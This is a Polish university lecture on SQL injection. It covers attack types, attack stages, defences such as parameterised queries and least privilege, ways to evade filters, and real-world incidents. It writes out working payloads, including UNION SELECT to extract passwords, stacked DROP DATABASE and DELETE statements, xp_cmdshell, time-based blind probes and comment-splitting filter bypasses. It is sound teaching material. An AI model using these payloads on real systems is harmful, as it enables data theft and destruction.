Znaj wroga i samego siebie, a możesz stoczyć sto bitew, nie zaznając porażki

Wielkość: px
Rozpocząć pokaz od strony:

Download "Znaj wroga i samego siebie, a możesz stoczyć sto bitew, nie zaznając porażki"

Transkrypt

1 Plan wykładu Spis treści 1 Wstrzyknięcia SQL - typy ataku 1 2 Etapy ataku 6 3 Zabezpieczenia 6 4 Atak na zabepieczenia 8 5 Z życia wzięte 9 6 Źródła 9 Znaj wroga i samego siebie, a możesz stoczyć sto bitew, nie zaznając porażki 1 Wstrzyknięcia SQL - typy ataku Wstrzyknięcia SQL Sun Zi SQL Injection - wstrzyknięcie kodu SQL - luka w zabezpieczeniach aplikacji internetowych polegająca na nieodpowiednim filtrowaniu lub niedostatecznym typowaniu i późniejszym wykonaniu danych przesyłanych w postaci zapytań SQL do bazy danych. Podatne są na niego systemy złożone z warstwy programistycznej (przykładowo skrypt w PHP, ASP, JSP itp.) dynamicznie generującej zapytania do bazy danych. Wynika on zwykle z braku doświadczenia lub wyobraźni programisty. Schemat ataku

2 Niedostateczne filtrowanie danych Przykładowe zapytanie: statement = "SELECT * FROM users WHERE name = " + username + " ;" Nieodpowiednie filtrowanie znaków ucieczki z danych wejściowych pozwala na przekazanie dodatkowych parametrów do zapytania: or 1 = 1 -- or 1 = 1 ({ or 1 = 1 /* W efekcie otrzymujemy: SELECT * FROM users WHERE name = OR 1 = 1 ; Niedostateczne filtrowanie danych cd Przykładowe zapytanie wewnątrz kodu PHP: SELECT produkt_id, nazwa, opis, kwota FROM produkty JOIN zamowienia USING(produkt.id) WHERE (klient_id=$id) ORDER BY nazwa Wstrzyknięcie: 0 OR 1=1 W efekcie napastnik otrzymuje historię zamówień wszystkich klientów. 2

3 Niedostateczne filtrowanie danych cd Przykładowe zapytanie wewnątrz kodu PHP: SELECT produkt_id, nazwa, opis, kwota FROM produkty JOIN zamowienia USING(produkt.id) WHERE (klient_id=$id) ORDER BY nazwa Wstrzyknięcie: -1) UNION SELECT klient_id, login, haslo, 0 FROM klienci -- Napastnik otrzyma dane klientów sklepu. API dopuszczające wiele zapytań Przykładowe zapytanie: statement = "SELECT * FROM users WHERE name = " + username + " ;" Dorzucenie kolejnego polecenia: a ; DELETE FROM users; SELECT * FROM userinfo WHERE t = t W efekcie otrzymujemy: SELECT * FROM users WHERE name = a ; DELETE FROM users; SELECT * FROM userinfo WHERE t = t ; API dopuszczające wiele zapytań cd Przykładowy blok anonimowy PL/SQL: Encrypt_password( bob, mypassword ); Dorzucenie kolejnego polecenia w miejsce mypassword : Encrypt_password( bob, mypassword ); DELETE FROM users WHERE upper(username) = upper( admin ); Wstrzyknięcie do argumentów funkcji Wstrzyknięcie może nastapić poprzez argumenty funkcji składowanych lub funkcji użytkownika. Zmiany w bazie danych będą możliwe jedynie, gdy zaatakowana funkcja będzie: zagnieżdżona wewnątrz INSERT, UPDATE, lub DELETE będzie stanowiła odrębną transakcję (PRAGMA TRANSACTION) 3

4 Przykładowe zapytanie: SELECT TRANSLATE( user input, ABCDEFGHIJKLMNOPQRSTUVWXYZ, ) FROM dual; Po ataku: SELECT TRANSLATE( UTL_HTTP.REQUEST( ), ABCDEFGHIJKLMNOPQRSTUVWXYZ, ) FROM dual; lub: SELECT TRANSLATE( myappadmin.adduser( admin, newpass ), ABCDEFGHIJKLMNOPQRSTUVWXYZ, ) FROM dual; Przeładowanie bufora Istnieją funkcję, które po wywołaniu z nieprawidłowymi argumentami spowodują przeładowanie bufora: tz_offset (przesunięcie godzinowe zadanej parametrem strefy względem strefy czasowej ustawionej na serwerze) to_timestamp_tz (konwersja łańcuchów na znacznik czasowy) bfilename (zwraca lokator do obiektu BFILE) Wstrzyknięcia w dynamicznym SQL u Przykładowa procedura PL/SQL: CREATE OR REPLACE PROCEDURE demo(name IN VARCHAR2) AS sql VARCHAR2; code VARCHAR2; sql := SELECT postal-code FROM states WHERE state-name = name ; EXECUTE IMMEDIATE sql INTO code; --IF code = IL THEN... Można wstrzyknąć: Some Name ; GRANT CONTROL TO [Malicious User]; PRINT Game over! This system is no longer yours! -- Malicious User now can control the database!!! 4

5 Wstrzyknięcia w dynamicznym SQL u cd Przykładowa procedura PL/SQL: CREATE OR REPLACE PROCEDURE demo(value IN VARCHAR2) AS -- bardzo niebezpieczne EXECUTE IMMEDIATE updatepass( value ); ; Można wstrzyknąć dowolną serię instrukcji. Wykorzystanie uprawnień Przykładowe zapytanie: statement = "SELECT * FROM users WHERE name = " + username + " ;" Dorzucenie kolejnego polecenia: a ; DROP TABLE users; DROP DATABASE SKLEP; SELECT * FROM userinfo WHERE t = t W efekcie otrzymujemy: SELECT * FROM users WHERE name = a ; DROP TABLE users; DROP DATABASE SKLEP; SELECT * FROM userinfo WHERE t = t ; Wykorzystanie uprawnień cd Przykładowe zapytanie: statement = "SELECT * FROM users WHERE name = " + username + " ;" Dorzucenie kolejnego polecenia: a ; exec master..xp_cmdshell iisreset /stop -- Dla źle skonfigurowanej bazy MS SQL Server pod Windows, spowoduje to zatrzymanie serwera. Atak z poziomu systemu Jeśli konto, z którego korzystamy, ma uprawnienia do odczytu i zapisu, da się wówczas przesłać do bazy danych pliki zawierające hasła lub informacje konfiguracyjne. W podobny sposób można zmieniać hasła lub nadpisywać pliki systemowe. 5

6 Ślepe wstrzyknięcia Ślepy atak (ang. blind injection) jest wykonywany na aplikacji, która nie wyświetla komunikatów błędów (zastosowano paradygmat security through obscurity). sprawdzenie, czy aplikacja jest podatna na wstrzyknięcia, poprzez porównanie efektu działania dwóch zapytań: SELECT booktitle FROM booklist WHERE bookid = OOk14cd AND 1 = 1 ; SELECT booktitle FROM booklist WHERE bookid = OOk14cd AND 1 = 2 ; wymuszenie błędu dla dobrze zadanego warunku: SELECT 1/0 FROM users WHERE username= Ralph ; wprowadzenie opóźnień czasowych SELECT booktitle FROM booklist WHERE bookid = OOk14cd AND BENCHMARK(999999,BENCHMARK(999999, BENCHMARK(999999,MD5(NOW()))))=0 OR 1 = 1 2 Etapy ataku Etapy ataku - Walidacja wejścia Walidacja wejścia - sprawdzenie luk poprzez kontrolę punktów wejściowych : pól w formularzach, parametrów skryptów w zapytaniach wysyłanych jako część adresów URL, wartości przechowywanych w plikach cookies, które są wysyłane do aplikacji sieciowej, wysyłanych wartości znajdujących się w ukrytych polach, reakcja na wprowadzenie opóźnień. Zbieranie informacji Etap zbierania informacji składa się z następujących elementów: mechanizmy wyjścia (czy wyświetla jawnie wyniki, czy wyświetla informacje o błędach) identyfikowanie rodzaju zapytania (SELECT, UPDATE, EXEC, INSERT, DELE- TE, CREATE itp) identyfikowanie serwera bazy danych (poprzez specyficzne zapisy, operatory, funkcje) rozpoznawanie stopnia uprzywilejowania użytkownika 6

7 Przeprowadzenie ataku 1=1 Rozpoznanie struktury bazy danych Odróżnienie kolumn numerycznych od alfanumerycznych Wyświetlenie wszystkich tabel zdefiniowanych przez użytkownika Wydobycie informacji Wydobycie nazw użytkowników i haseł Umieszczenie własnego użytkownika dla aplikacji Dysponując odpowiednimi uprawnieniami, napastnik może również utworzyć własne konto w bazie danych 3 Zabezpieczenia Zabezpieczanie na poziomie aplikacji Niedopuszczenie do nieuprawnionej zmiany wykonywanego zapytania \, dzięki cze- addslashes() dodaje backslash przed znakami, takimi jak, " czy mu znaki te nie są traktowane jak znaki specjalne DBI::quote czy mysql_real_escape_string() - jw. is_numeric(num) - sprawdza czy zmienna jest wartością numeryczną rzutowanie na typ liczbowy parametrów numerycznych wykorzystanie parametryzacji charakterystycznej dla danego API $query = $sql->prepare("select * FROM users WHERE name =?"); $query->execute($user_name); nie wstawianie zmiennych poprzez konkatenację łańcuchów jasne zdefiniowanie typu danych przypisanych do każdego pola - tzn. tylko wejście o określonym formacie może być dalej przetwarzane, wejście o podejrzanym formacie jest natychmiast odrzucane implementacja filtrów SQL odrzucających podejrzane formuły z klauzulami SELECT, UPDATE itp. Przykład zabezpieczenia Procedurę PL/SQL: CREATE OR REPLACE PROCEDURE demo(value IN VARCHAR2) AS -- bardzo niebezpieczne EXECUTE IMMEDIATE updatepass( value ); ; powinniśmy zapisać następująco: 7

8 CREATE OR REPLACE PROCEDURE demo(value IN VARCHAR2) AS -- poprawnie cmd := updatepass(:1); ; EXECUTE IMMEDIATE cmd USING value; Przykład zabezpieczenia Kod java: String name = request.getparameter("name"); PreparedStatement pstmt = conn.preparestatement("insert into EMP (ENAME) values ( " + name + " )"); pstmt.execute(); pstmt.close(); powinniśmy zapisać następująco: PreparedStatement pstmt = conn.preparestatement ("insert into EMP (ENAME) values (?)"); String name = request.getparameter("name"); pstmt.setstring (1, name); pstmt.execute(); pstmt.close(); Zabezpieczenie na poziomie bazy danych minimalizacja uprawnień = minimalizacja szkód sprawdzenie skuteczności ( siły ) hasła użytkownika zmiana uprawnień i usunięcie publicznego dostępu do obiektów publicznych w bazie danych stosowanie procedur składowanych (zapytanie budowane jest po stronie bazy danych i aplikacja nie ma bezpośredniego wpływu na jego postać) stosowanie wyzwalaczy Zabezpieczenie na poziomie serwera aplikacji/www instalacja dodatkowych modułów serwera warstwy aplikacyjnej np dla Apache: mod_security - filtruje wg zdefiniowanych reguł przychodzące żądania i blokuje te potencjalnie groźne. Reguły pozwalają na wychwycenie typowych uniwersalnych ataków lub znanych luk w popularnych aplikacjach. Wadą rozwiązania jest możliwość zablokowania także pożądanych wywołań. mod_rewrite - pozwala m.in. na wykonanie przekierowania przychodzącego żądania pod zupełnie inny adres na serwerze; poprzez modyfikację adresu URL strony można ukryć oryginalną nazwę skryptu i wykorzystywane przez niego parametry. 8

9 4 Atak na zabepieczenia Ataki na zabezpieczenia systemy zabezpieczające wyłapują zapis OR 1=1, zaś atakujący często wykorzystują dowolny warunek zawsze zwracający prawdę: OR unusual = unusual OR something = some + thing OR text = N text OR something like some% OR 2 > 1 OR text > t OR whatever IN ( whatever ) OR 2 BETWEEN 1 AND 3 użycie addslashes() (przykład w PHP) lub magic_quotes_gpc(), nie zapobiega możliwości ataku na pola numeryczne - użycie różnego kodowania znaków, np. Unicode/UTF 8, Hex ominięcie zabezpieczeń poprzez wielokrotne komentowanie, UNION/**/SELECT/**/ /**/OR/**/1/**/=/**/1 rozbicie złośliwego kodu na wiele linii, USERNAME: or 1/* PASSWORD: */ =1 -- specyficzna konkatenacja łańcuchów lub UNI/**/ON SEL/**/ECT ; EXECUTE IMMEDIATE SEL ECT US ER 5 Z życia wzięte Przykłady z życia wzięte 2005 r. - tajwański uczeń kradnie dane klientów Tech Target Group 2006 r. - Rosjanin kradnie dane dotyczące kart kredytowych z serwisów urzędów Rhode Island 2007 r. - wstrzyknięcie na brytyjskiej stronie Microsoft 2008 r. - zmasowane wstrzyknięcie wykorzystujace luki serwera MS SQL 2009 r. - kradzież 130 milionów numerów kart kredytowych w Stanach Zjednoczonych 19 września 2010 r. - wstrzyknięcie wewnątrz głosu oddanego na stronie umożliwiającej głosowanie w czasie wyborów w Szwecji 8 listopada 2010 r. - wstrzyknięcie dokonane na stronie British Royal Navy 9

10 Z ostatniej chwili 5 luty 2011 r. - włamanie na stronę HBGary 27 marca 2011 r. - oficjalna strona MySQL została skutecznie zaatakowana z wykorzystaniem ślepego ataku Sierpień kradzież danych użytkowników z Nokia developer site Maj zamknięcie strony Wurm Online podczas jej aktualizacji 6 Źródła Źródła W wykładzie wykorzystano materiały: stron.www. Wikipedia php 10

Programowanie w jêzyku PL/SQL

Programowanie w jêzyku PL/SQL Oracle Database 11g. Programowanie w jêzyku PL/SQL Autor: Michael McLaughlin T³umaczenie: Tomasz Walczak ISBN: 978-83-246-1938-2 Tytu³ orygina³u: Oracle Database 11g PL/SQL Programming Format: 168x237,

Bardziej szczegółowo

PROJEKTOWANIE BAZ DANYCH

PROJEKTOWANIE BAZ DANYCH Uniwersytet Przyrodniczy w Poznaniu - Instytut Inżynierii Biosystemów - Zakład Informatyki Stosowanej PROJEKTOWANIE BAZ DANYCH Ćwiczenia T-SQL - SQL Server 2008 / 2012 Prowadzący: dr inż. Radosław J. Kozłowski

Bardziej szczegółowo

http://www.oracle.com/technology/software/products/workflow/htdocs/winclient.html

http://www.oracle.com/technology/software/products/workflow/htdocs/winclient.html Workflow knowledge Skąd pobrać... 2 Jak uruchomić / zatrzymać workflow z poziomu kodu... 2 Przekazywanie parametrów pomiędzy klockami workflow... 3 Jak odczytać / zapisać wartość atrybutu globalnego (ItemType)...

Bardziej szczegółowo

SQL i PL/SQL podstawy

SQL i PL/SQL podstawy O Oracle ludzkim głosem SQL i PL/SQL podstawy Andrzej Klusiewicz \ Podstawy SQL i PL/SQL. Bezpłatny e-book wersja: 1.1 06-05-2013 www.jsystems.pl str. 1/140 Spis treści O Oracle ludzkim głosem...1 Licencja

Bardziej szczegółowo

Deklarowanie kursora. CURSOR nazwa [ ( param1 typ1 [,param2 typ2]... ) ] [RETURN typ zwracany] IS zapytanie SQL;

Deklarowanie kursora. CURSOR nazwa [ ( param1 typ1 [,param2 typ2]... ) ] [RETURN typ zwracany] IS zapytanie SQL; Kursory Każde zapytanie SQL umieszczone w programie PLSQL jest wykonywane w tzw. obszarze roboczym lub inaczej obszarze kontekstu. PLSQL wykorzystuje ten obszar do przechowywania danych otrzymanych w wyniku

Bardziej szczegółowo

OBSŁUGA WYJĄTKÓW. Mechanizm języka PL/SQL. Wyjątki:

OBSŁUGA WYJĄTKÓW. Mechanizm języka PL/SQL. Wyjątki: OBSŁUGA WYJĄTKÓW W języku PL/SQL zaimplementowano obsługę błędów za pomocą: mechanizmu wyjątków programów obsługi wyjątków w tzw. sekcji obsługi wyjątków. Wyjątki mogą być związane z: błędami systemu Oracle

Bardziej szczegółowo

ZASTOSOWANIE PROCEDUR, FUNKCJI I PAKIETÓW

ZASTOSOWANIE PROCEDUR, FUNKCJI I PAKIETÓW ZASTOSOWANIE PROCEDUR, FUNKCJI I PAKIETÓW Położenie podprogramów Jak wiemy, podprogramy i pakiety jako bloki nazwane, mogą być składowane w słowniku danych. Podprogram najpierw tworzy się za pomocą polecenia

Bardziej szczegółowo

GRAFFITI BUILDER PODRĘCZNIK UŻYTKOWNIKA

GRAFFITI BUILDER PODRĘCZNIK UŻYTKOWNIKA GRAFFITI BUILDER PODRĘCZNIK UŻYTKOWNIKA Podręcznik użytkownika aplikacji Graffiti Builder. Graffiti.ERP jest zintegrowanym systemem informatycznym klasy MRPII/ERP wspomagającym zarządzanie przedsiębiorstwem,

Bardziej szczegółowo

Raport kwartalny CERT.GOV.PL. lipiec wrzesień 2011

Raport kwartalny CERT.GOV.PL. lipiec wrzesień 2011 Raport kwartalny CERT.GOV.PL lipiec wrzesień 2011 1. Informacje dotyczące zespołu CERT.GOV.PL... 2 2. Statystyki systemu ARAKIS-GOV... 3 3. Statystyki incydentów... 5 4. Istotne podatności, zagrożenia

Bardziej szczegółowo

Wydział Elektrotechniki, Informatyki i Telekomunikacji. Instytut Informatyki i Elektroniki. Język PL/SQL 1. UWAGI WSTĘPNE...3 2. BLOKI ANONIMOWE...

Wydział Elektrotechniki, Informatyki i Telekomunikacji. Instytut Informatyki i Elektroniki. Język PL/SQL 1. UWAGI WSTĘPNE...3 2. BLOKI ANONIMOWE... Wydział Elektrotechniki, Informatyki i Telekomunikacji Instytut Informatyki i Elektroniki Język PL/SQL 1. UWAGI WSTĘPNE...3 2. BLOKI ANONIMOWE...3 2.1. Składnia... 3 2.2. Przykłady... 4 2.3. Najprostsze

Bardziej szczegółowo

Aby nie być gołosłownym, przejdźmy od słów do czynów. Połączymy się z naszą bazą utworzoną podczas wcześniejszych lekcji:

Aby nie być gołosłownym, przejdźmy od słów do czynów. Połączymy się z naszą bazą utworzoną podczas wcześniejszych lekcji: PHP/Biblioteka PDO 1 PHP/Biblioteka PDO Biblioteka PDO Jeszcze rok temu programiści pragnący komunikować się z bazą danych poprzez PHP musieli zmagać się z wieloma problemami. Każdy serwer DB udostępniał

Bardziej szczegółowo

Analiza porównawcza języków procedur składowanych PL/SQL, SQL PL, PL/pgSQL i T-SQL

Analiza porównawcza języków procedur składowanych PL/SQL, SQL PL, PL/pgSQL i T-SQL POLITECHNIKA WARSZAWSKA Wydział Elektroniki i Technik Informacyjnych PRACA DYPLOMOWA MAGISTERSKA Marta Bańkowska Nr albumu: 161484 Analiza porównawcza języków procedur składowanych PL/SQL, SQL PL, PL/pgSQL

Bardziej szczegółowo

Opis przedmiotu zamówienia

Opis przedmiotu zamówienia Opis przedmiotu zamówienia do postępowania o zamówienie publiczne na: kompleksową dostawę, wdrożenie i utrzymanie Zintegrowanego Informatycznego Systemu Wspomagania Zarządzania Uczelnią klasy ERP wraz

Bardziej szczegółowo

Apache jako Reverse Proxy

Apache jako Reverse Proxy Apache jako Reverse Proxy Obrona Radosław Goblin Pieczonka stopień trudności W środowisku firmowym często można na serwerach intranetowych znaleźć oprogramowanie potencjalnie podatne na różnego rodzaju

Bardziej szczegółowo

Joomla! Zabezpieczanie witryn

Joomla! Zabezpieczanie witryn Joomla! Zabezpieczanie witryn Autor: Tom Canavan T³umaczenie: Roman Gryzowski, Tomasz Walczak ISBN: 978-83-246-2197-2 Tytu³ orygina³u: Joomla! Web Security Format: 170 230, stron: 248 Zabezpiecz stronê

Bardziej szczegółowo

15. Funkcje i procedury składowane PL/SQL

15. Funkcje i procedury składowane PL/SQL 15. Funkcje i procedury składowane PLSQL 15.1. SQL i PLSQL (Structured Query Language - SQL) Język zapytań strukturalnych SQL jest zbiorem poleceń, za pomocą których programy i uŝytkownicy uzyskują dostęp

Bardziej szczegółowo

PLATFORMA ASCENT.DBI PODRĘCZNIK UŻYTKOWNIKA

PLATFORMA ASCENT.DBI PODRĘCZNIK UŻYTKOWNIKA PLATFORMA ASCENT.DBI PODRĘCZNIK UŻYTKOWNIKA Copyright 2008 PC Guard SA. Wszelkie prawa zastrzeżone. Podręcznik użytkownika systemu Ascent.DBI. Ascent.DBI jest systemem, który wspiera koordynację procedur

Bardziej szczegółowo

Ćwiczenie 13 PL/SQL. Język PL/SQL procedury, funkcje, pakiety, wyzwalacze

Ćwiczenie 13 PL/SQL. Język PL/SQL procedury, funkcje, pakiety, wyzwalacze Ćwiczenie 13 PL/SQL Język PL/SQL procedury, funkcje, pakiety, wyzwalacze Ćwiczenie 13 PL/SQL Niniejsze ćwiczenie zaprezentuje składowane w bazie danych programy PL/SQL: procedury, funkcje, pakiety oraz

Bardziej szczegółowo

Rys. 1. Haker zgaduje inne adresy sieciowe korzystając z adresu IP serwera

Rys. 1. Haker zgaduje inne adresy sieciowe korzystając z adresu IP serwera Najprostszy atak hakerski Jak wiadomo, każdy komputer w sieci ma własny adres IP. Każdy komputer przyłączony do sieci dołącza do każdego transmitowanego pakietu adres IP komputera docelowego oraz unikatową

Bardziej szczegółowo

Płatności za pośrednictwem witryny podręcznik integracji

Płatności za pośrednictwem witryny podręcznik integracji Płatności za pośrednictwem witryny podręcznik integracji 2006 PayPal Inc. Wszelkie prawa zastrzeżone. PayPal i logo PayPal są zastrzeżonymi znakami towarowymi firmy PayPal Inc. Inne znaki towarowe i marki

Bardziej szczegółowo

Szkolenie techniczne. Kopalnia wiedzy o rozwiązaniach firmy G Data dla biznesu. Go safe. Go Safer. G Data.

Szkolenie techniczne. Kopalnia wiedzy o rozwiązaniach firmy G Data dla biznesu. Go safe. Go Safer. G Data. Szkolenie techniczne Kopalnia wiedzy o rozwiązaniach firmy G Data dla biznesu Go safe. Go Safer. G Data. -2- Spis treści 1. G Data ClientSecurity Enterprise... 4 1.1. G Data ClientSecurity Business...4

Bardziej szczegółowo

Peregrine. AssetCenter Uwagi PART NUMBER AC-3.6X-POL-01015-00153

Peregrine. AssetCenter Uwagi PART NUMBER AC-3.6X-POL-01015-00153 Peregrine AssetCenter Uwagi PART NUMBER AC-3.6X-POL-01015-00153 AssetCenter c Copyright 2001 Peregrine Systems, Inc. Wszelkie prawa zastrzeżone. Informacje zawarte w ninieszym dokumencie są własnością

Bardziej szczegółowo

Opcja płatności: Standardowa realizacja transakcji podręcznik integracji

Opcja płatności: Standardowa realizacja transakcji podręcznik integracji Opcja płatności: Standardowa realizacja transakcji podręcznik integracji Tylko do zastosowań profesjonalnych Aktualnie funkcja dostępna wyłącznie w języku angielskim. A usage Professional Uniquement Disponible

Bardziej szczegółowo

Ustawienia bezpieczeństwa w Exchange Server, SharePoint i Lync

Ustawienia bezpieczeństwa w Exchange Server, SharePoint i Lync Ustawienia bezpieczeństwa w Exchange Server, SharePoint i Lync Dokument powstał w ramach współpracy w obszarze bezpieczeństwa teleinformatycznego w postaci programu SCP (Security Cooperation Program) Spis

Bardziej szczegółowo

Rozdział 1: Instalacja...5

Rozdział 1: Instalacja...5 F-Secure Internet Security 2014 F-Secure Internet Security 2014 Spis treści 2 Spis treści Rozdział 1: Instalacja...5 1.1 Przed pierwszą instalacją...6 1.2 Instalowanie produktu po raz pierwszy...7 1.3

Bardziej szczegółowo

IBM DB2 cechy warte odnotowania

IBM DB2 cechy warte odnotowania IBM DB2 cechy warte odnotowania v v v v v v Różne typy tabel w tym MDC - wielowymiarowe Podział jednej bazy danych na niezależne partycje nie tylko pojedynczej tabeli Łączenie pokrewnych instrukcji w jedną

Bardziej szczegółowo

Raport o stanie bezpieczeostwa cyberprzestrzeni RP w 2010 roku

Raport o stanie bezpieczeostwa cyberprzestrzeni RP w 2010 roku Raport o stanie bezpieczeostwa cyberprzestrzeni RP w 2010 roku Warszawa 2011 CERT.GOV.PL CERT.GOV.PL Rządowy Zespół Reagowania na Incydenty Komputerowe CERT.GOV.PL został powołany w dniu 1 lutego 2008

Bardziej szczegółowo

ESET NOD32 ANTIVIRUS 8

ESET NOD32 ANTIVIRUS 8 ESET NOD32 ANTIVIRUS 8 Podręcznik użytkownika (dotyczy programu w wersji 8.0 lub nowszej) Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Kliknij tutaj, aby pobrać najnowszą

Bardziej szczegółowo

Bezpieczne aplikacje internetowe

Bezpieczne aplikacje internetowe POCZĄTKI CEZARY G. CEREKWICKI Bezpieczne aplikacje internetowe Stopień trudności Dla wielu mniej zaawansowanych twórców aplikacji webowych projekt kończy się wraz z wyklikaniem w swoim tworze podstawowych

Bardziej szczegółowo

Oprogramowanie do obsługi automatycznych wózków widłowych. Dokumentacja techniczna

Oprogramowanie do obsługi automatycznych wózków widłowych. Dokumentacja techniczna Oprogramowanie do obsługi automatycznych wózków widłowych Dokumentacja techniczna Spis treści Program Klient... 2 Przeznaczenie... 2 Budowa i funkcjonalność... 2 Okno główne... 3 Żądanie... 7 Elementy

Bardziej szczegółowo